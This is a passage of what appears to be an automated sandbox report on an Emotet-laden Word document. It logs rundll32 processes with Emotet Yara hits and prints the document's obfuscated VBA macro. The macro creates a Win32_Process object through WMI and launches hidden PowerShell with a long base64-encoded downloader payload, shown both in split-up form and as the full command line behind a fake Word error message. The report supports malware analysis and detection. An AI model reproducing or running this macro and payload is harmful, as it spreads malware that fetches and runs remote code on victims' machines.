Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2121698890.0000000000190000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3068 Parent PID: 2836

General

Start time:	16:31:56
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eqlmzzdzvxl\jxrtnvzlrw.xix',Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2124305408.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3060 Parent PID: 3068

General

Start time:	16:31:57
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qjhyis\vvyps.icm',Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2355747254.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2355718078.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Bt08uhxu1tnhy1

Declaration

Line	Content
1	Attribute VB_Name = "Bt08uhxu1tnhy1"

Module: Xhlj9irufb65_wekzf

Declaration

Line	Content
1	Attribute VB_Name = "Xhlj9irufb65_wekzf"

Executed Functions

Function Jotxu6biv0471oy0, APIs: 107, Strings: 29, Number of lines: 158, Relevance: 248.658

APIs	Meta Information
Item
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: LOF
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: intGend
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: LOF
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: intGend
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: LOF
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: intGend
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: LOF
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: intGend
FreeFile
Open
Open
LOF
intGend
CreateObject	CreateObject("winmgmts:win32_process")
FreeFile
Open
Open
LOF
intGend
Mid
Len	Len("\x01 ]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s JAA]b2[s2AD]b2[skAb]b2[sQBE]b2[sAFQ]b2[sANw]b2[sAgA]b2[sCAA]b2[sPQA]b2[sgAF]b2[ssAd]b2[sAB5]b2[sAFA]b2[sARQ]b2[sBdA]b2[sCgA]b2[sIgB]b2[s7AD]b2[sEAf]b2[sQB7]b2[sADM]b2[sAfQ]b2[sB7A]b2[sDAA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQAi]b2[sAC0]b2[sAZg]b2[sAnA]b2[sFIA]b2[sJwA]b2[ssAC]b2[scAU]b2[swAn]b2[sACw]b2[sAJw]b2[sBZA]b2[sCcA]b2[sLAA]b2[snAF]b2[skAU]b2[swB0]b2[sAEU]b2[sATQ]b2[sAuA]b2[sEkA]b2[sTwA]b2[suAG]b2[sQAa]b2[sQBS]b2[sAEU]b2[sAYw]b2[sBUA]b2[sE8A]b2[sJwA]b2[spAC]b2[sAAO]b2[swAg]b2[sACA]b2[sAIA]b2[sAkA]b2[sHkA]b2[sMQA]b2[swAE]b2[skAI]b2[sAAg]b2[sAD0]b2[sAIA]b2[sBbA]b2[sFQA]b2[seQB]b2[swAE]b2[sUAX]b2[sQAo]b2[sACI]b2[sAew]b2[sA2A]b2[sH0A]b2[sewA]b2[szAH]b2[s0Ae]b2[swAy]b2[sAH0]b2[sAew]b2[sA3A]b2[sH0A]b2[sewA]b2[s0AH]b2[s0Ae]b2[swAx]b2[sAH0]b2[sAew]b2[sA1A]b2[sH0A]b2[sewA]b2[s4AH]b2[s0Ae]b2[swAw]b2[sAH0]b2[sAIg]b2[sAtA]b2[sGYA]b2[sIAA]b2[snAG]b2[sEAR]b2[swBl]b2[sAFI]b2[sAJw]b2[sAsA]b2[sCcA]b2[sdAA]b2[suAC]b2[scAL]b2[sAAn]b2[sAEU]b2[sAJw]b2[sAsA]b2[sCcA]b2[sWQB]b2[sTAH]b2[sQAJ]b2[swAs]b2[sACc]b2[sATg]b2[sBFA]b2[sCcA]b2[sLAA]b2[snAH]b2[sMAR]b2[sQBS]b2[sAHY]b2[sAaQ]b2[sBDA]b2[sCcA]b2[sLAA]b2[snAH]b2[sMAJ]b2[swAs]b2[sACc]b2[sAbQ]b2[sAuA]b2[sCcA]b2[sLAA]b2[snAG]b2[sUAU]b2[sABv]b2[sAGk]b2[sAbg]b2[sB0A]b2[sG0A]b2[sYQB]b2[suAC]b2[scAK]b2[sQA7]b2[sACQ]b2[sARQ]b2[sByA]b2[sHIA]b2[sbwB]b2[syAE]b2[sEAY]b2[swB0]b2[sAGk]b2[sAbw]b2[sBuA]b2[sFAA]b2[scgB]b2[slAG]b2[sYAZ]b2[sQBy]b2[sAGU]b2[sAbg]b2[sBjA]b2[sGUA]b2[sIAA]b2[s9AC]b2[sAAK]b2[sAAo]b2[sACc]b2[sAUw]b2[sBpA]b2[sCcA]b2[sKwA]b2[snAG]b2[swAZ]b2[sQBu]b2[sAHQ]b2[sAbA]b2[sB5A]b2[sCcA]b2[sKQA]b2[srAC]b2[sgAJ]b2[swBD]b2[sAG8]b2[sAJw]b2[sArA]b2[sCcA]b2[sbgA]b2[snAC]b2[skAK]b2[swAn]b2[sAHQ]b2[sAJw]b2[sArA]b2[sCgA]b2[sJwB]b2[spAG]b2[s4AJ]b2[swAr]b2[sACc]b2[sAdQ]b2[sAnA]b2[sCkA]b2[sKwA]b2[snAG]b2[sUAJ]b2[swAp]b2[sADs]b2[sAJA]b2[sBQA]b2[sHkA]b2[sMAB]b2[slAG]b2[sIAa]b2[sgBp]b2[sAD0]b2[sAJA]b2[sBLA]b2[sDEA]b2[sMgB]b2[sPAC]b2[sAAK]b2[swAg]b2[sAFs]b2[sAYw]b2[sBoA]b2[sGEA]b2[scgB]b2[sdAC]b2[sgAN]b2[sgA0]b2[sACk]b2[sAIA]b2[sArA]b2[sCAA]b2[sJAB]b2[sQAD]b2[sYAN]b2[sQBa]b2[sADs]b2[sAJA]b2[sBYA]b2[sDkA]b2[sMgB]b2[sDAD]b2[s0AK]b2[sAAo]b2[sACc]b2[sAVQ]b2[sAnA]b2[sCsA]b2[sJwB]b2[sfAD]b2[sgAJ]b2[swAp]b2[sACs]b2[sAJw]b2[sBSA]b2[sCcA]b2[sKQA]b2[s7AC]b2[sAAI]b2[sAAk]b2[sADY]b2[sAOQ]b2[sBNA]b2[sGQA]b2[sdAA]b2[s3AD]b2[soAO]b2[sgAi]b2[sAEM]b2[sAcg]b2[sBgA]b2[sGUA]b2[sYQB]b2[sUAG]b2[sAAR]b2[sQBk]b2[sAEk]b2[sAUg]b2[sBFA]b2[sEMA]b2[sdAB]b2[svAG]b2[sAAU]b2[sgBZ]b2[sACI]b2[sAKA]b2[sAkA]b2[sEgA]b2[sTwB]b2[sNAE]b2[sUAI]b2[sAAr]b2[sACA]b2[sAKA]b2[sAoA]b2[sCcA]b2[sWgA]b2[snAC]b2[ssAK]b2[sAAn]b2[sAE0]b2[sAJw]b2[sArA]b2[sCcA]b2[sUAB]b2[sZAG]b2[scAe]b2[sQAn]b2[sACs]b2[sAJw]b2[sBoA]b2[sCcA]b2[sKQA]b2[srAC]b2[sgAJ]b2[swBs]b2[sAHE]b2[sAdA]b2[sBaA]b2[sCcA]b2[sKwA]b2[snAE]b2[s0AJ]b2[swAp]b2[sACs]b2[sAJw]b2[sBQA]b2[sEIA]b2[sJwA]b2[srAC]b2[sgAJ]b2[swB4]b2[sACc]b2[sAKw]b2[sAnA]b2[sDUA]b2[sagA]b2[snAC]b2[skAK]b2[swAn]b2[sAGY]b2[sAJw]b2[sArA]b2[sCgA]b2[sJwB]b2[stAG]b2[s8AW]b2[sgBN]b2[sACc]b2[sAKw]b2[sAnA]b2[sFAA]b2[sJwA]b2[spAC]b2[skAL]b2[sQBS]b2[sAGU]b2[sAcA]b2[sBsA]b2[sGEA]b2[sYwB]b2[sFAC]b2[sgAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sOQA]b2[swAC]b2[ssAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sNwA]b2[s3AC]b2[ssAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sOAA]b2[swAC]b2[skAL]b2[sABb]b2[sAEM]b2[sAaA]b2) -> 14756
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
Create	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQA,,) -> 0
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: LOF
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: intGend
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: LOF
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: intGend
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: LOF
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: intGend
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: Open
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: LOF
Part of subcall function Lehj73snaqzhyepdw9@Xhlj9irufb65_wekzf: intGend
Ndofzqkqt8o8ky4
Es2mklc5pr30boja
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend

Strings	Decrypted Strings
"F:\emayA\cEXRoDjH\VwIACIE.cAhxFlQk"
"O:\vzKFL\xTplfDEO\UzdPBJhtk.FxjwCGqT"
"]b2[sp]b2[s"
"]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
"F:\JJhGoHJAy\mhYgHAECB\ScIqGCAp.sgqtGoGFB"
"O:\skwqjIHSw\BGDBEtNI\SVgGCDCe.oeVOIAwo"
"]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
"F:\MIXPEQq\xrgAtKF\wbeXEF.fMufiCa"
"O:\gtNTBHAA\pRTARkP\omJGJZDcR.TSCsY"
"w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
"F:\KzjhHR\fTZqG\WLFeZHJ.RQtHHgTHi"
"O:\xfHgsuZ\OuWcHBRFs\aVDcAfBmF.wxMQaJA"
"]b2[ss]b2[s"
"F:\qyUZgDN\BGtxCFHH\NTfeA.DExaE"
"O:\aIUpFwC\nTpvYbID\cOpRCH.yenkEdEBG"
"F:\BokkBJR\JVqtTl\wBdFDGCm.csxtJBIHA"
"O:\zDxufIC\iCExC\ZRtuVA.YMVmJ"
"F:\tzCMq\XMchB\YUPCDfDKL.EffNJq"
"O:\ZGlzCsC\TtOjBxE\gAFGG.ByczYWAGo"
"F:\yhIgJCIMF\qsJDB\PptZC.VCOUrPxF"
"O:\cRwnDC\zYXqog\gNodA.UMeMIyH"
"F:\SVdfFCU\nnqUrp\YWmSNHII.kFjgBgDk"
"O:\NCeDGUAx\liGyAIZj\lUyiD.VfSxEM"
"F:\nByRqYG\TFriHa\TImuB.vzTdgVSJ"
"O:\OoAuHBF\TrVff\lRegJKh.zDCEsFDJE"
"F:\UkqzBHD\AfilMCw\FaEXXAH.VJBQHBwD"
"O:\uYQKM\KtKdHCsGD\lkgPV.CtEPFIa"
"F:\AlLTF\KjklIF\ZbOCaDfmF.zRWqJ"
"O:\CSYaI\BeKGII\ISlAUHBA.hUrieDEBA"

Line	Instruction	Meta Information
2	Function Jotxu6biv0471oy0()
3	On Error Resume Next	executed
4	mKbjhqs = Xlb0g5eyj545.StoryRanges.Item(244 / 244)	Item
5	Goto aMSHGI
6	Dim VWDNpuI() as Byte
7	Dim FmdzUop as Integer
8	FmdzUop = FreeFile	FreeFile
9	Open "F:\emayA\cEXRoDjH\VwIACIE.cAhxFlQk" For Binary Access Read As # FmdzUop	Open
10	Open "O:\vzKFL\xTplfDEO\UzdPBJhtk.FxjwCGqT" For Binary Access Read As # FmdzUop	Open
11	Redim VWDNpuI(1 To LOF(intGend) - 5)	LOF intGend
12	Get # FmdzUop, , VWDNpuI
13	Get # FmdzUop, , VWDNpuI
14	Get # FmdzUop, , VWDNpuI
15	Close # FmdzUop
15	aMSHGI:
17	snahbsd = "]b2[sp]b2[s"
18	Mvmowvl61pq1 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
19	Goto BaaeH
20	Dim GEdfI() as Byte
21	Dim HHIaF as Integer
22	HHIaF = FreeFile	FreeFile
23	Open "F:\JJhGoHJAy\mhYgHAECB\ScIqGCAp.sgqtGoGFB" For Binary Access Read As # HHIaF	Open
24	Open "O:\skwqjIHSw\BGDBEtNI\SVgGCDCe.oeVOIAwo" For Binary Access Read As # HHIaF	Open
25	Redim GEdfI(1 To LOF(intGend) - 5)	LOF intGend
26	Get # HHIaF, , GEdfI
27	Get # HHIaF, , GEdfI
28	Get # HHIaF, , GEdfI
29	Close # HHIaF
29	BaaeH:
31	W_z0xk65anh723p = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
32	Goto QrZrL
33	Dim sIjWJBH() as Byte
34	Dim jKkUJJZ as Integer
35	jKkUJJZ = FreeFile	FreeFile
36	Open "F:\MIXPEQq\xrgAtKF\wbeXEF.fMufiCa" For Binary Access Read As # jKkUJJZ	Open
37	Open "O:\gtNTBHAA\pRTARkP\omJGJZDcR.TSCsY" For Binary Access Read As # jKkUJJZ	Open
38	Redim sIjWJBH(1 To LOF(intGend) - 5)	LOF intGend
39	Get # jKkUJJZ, , sIjWJBH
40	Get # jKkUJJZ, , sIjWJBH
41	Get # jKkUJJZ, , sIjWJBH
42	Close # jKkUJJZ
42	QrZrL:
44	Bcu4d7izwi5q = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
45	Goto zDLxpKAFE
46	Dim PFNPd() as Byte
47	Dim nBVGMJ as Integer
48	nBVGMJ = FreeFile	FreeFile
49	Open "F:\KzjhHR\fTZqG\WLFeZHJ.RQtHHgTHi" For Binary Access Read As # nBVGMJ	Open
50	Open "O:\xfHgsuZ\OuWcHBRFs\aVDcAfBmF.wxMQaJA" For Binary Access Read As # nBVGMJ	Open
51	Redim PFNPd(1 To LOF(intGend) - 5)	LOF intGend
52	Get # nBVGMJ, , PFNPd
53	Get # nBVGMJ, , PFNPd
54	Get # nBVGMJ, , PFNPd
55	Close # nBVGMJ
55	zDLxpKAFE:
57	Md7uay_rjhi = "]b2[ss]b2[s"
58	Goto OuPbAWEJB
59	Dim KnLfUEp() as Byte
60	Dim abJXtUnJ as Integer
61	abJXtUnJ = FreeFile	FreeFile
62	Open "F:\qyUZgDN\BGtxCFHH\NTfeA.DExaE" For Binary Access Read As # abJXtUnJ	Open
63	Open "O:\aIUpFwC\nTpvYbID\cOpRCH.yenkEdEBG" For Binary Access Read As # abJXtUnJ	Open
64	Redim KnLfUEp(1 To LOF(intGend) - 5)	LOF intGend
65	Get # abJXtUnJ, , KnLfUEp
66	Get # abJXtUnJ, , KnLfUEp
67	Get # abJXtUnJ, , KnLfUEp
68	Close # abJXtUnJ
68	OuPbAWEJB:
70	C_tmpi32le9 = Bcu4d7izwi5q + Md7uay_rjhi + W_z0xk65anh723p + snahbsd + Mvmowvl61pq1
71	Goto uwrli
72	Dim KcYzD() as Byte
73	Dim DLbwIFKRv as Integer
74	DLbwIFKRv = FreeFile	FreeFile
75	Open "F:\BokkBJR\JVqtTl\wBdFDGCm.csxtJBIHA" For Binary Access Read As # DLbwIFKRv	Open
76	Open "O:\zDxufIC\iCExC\ZRtuVA.YMVmJ" For Binary Access Read As # DLbwIFKRv	Open
77	Redim KcYzD(1 To LOF(intGend) - 5)	LOF intGend
78	Get # DLbwIFKRv, , KcYzD
79	Get # DLbwIFKRv, , KcYzD
80	Get # DLbwIFKRv, , KcYzD
81	Close # DLbwIFKRv
81	uwrli:
83	H4qcty67722xqmrmn = Lehj73snaqzhyepdw9(C_tmpi32le9)
84	Goto JpnbIUF
85	Dim jLIIJFE() as Byte
86	Dim GigmCE as Integer
87	GigmCE = FreeFile	FreeFile
88	Open "F:\tzCMq\XMchB\YUPCDfDKL.EffNJq" For Binary Access Read As # GigmCE	Open
89	Open "O:\ZGlzCsC\TtOjBxE\gAFGG.ByczYWAGo" For Binary Access Read As # GigmCE	Open
90	Redim jLIIJFE(1 To LOF(intGend) - 5)	LOF intGend
91	Get # GigmCE, , jLIIJFE
92	Get # GigmCE, , jLIIJFE
93	Get # GigmCE, , jLIIJFE
94	Close # GigmCE
94	JpnbIUF:
96	Set Fcqv6woostm0 = CreateObject(H4qcty67722xqmrmn)	CreateObject("winmgmts:win32_process") executed
97	Goto OstReD
98	Dim HXWoFCJP() as Byte
99	Dim gGHPnUA as Integer
100	gGHPnUA = FreeFile	FreeFile
101	Open "F:\yhIgJCIMF\qsJDB\PptZC.VCOUrPxF" For Binary Access Read As # gGHPnUA	Open
102	Open "O:\cRwnDC\zYXqog\gNodA.UMeMIyH" For Binary Access Read As # gGHPnUA	Open
103	Redim HXWoFCJP(1 To LOF(intGend) - 5)	LOF intGend
104	Get # gGHPnUA, , HXWoFCJP
105	Get # gGHPnUA, , HXWoFCJP
106	Get # gGHPnUA, , HXWoFCJP
107	Close # gGHPnUA
107	OstReD:
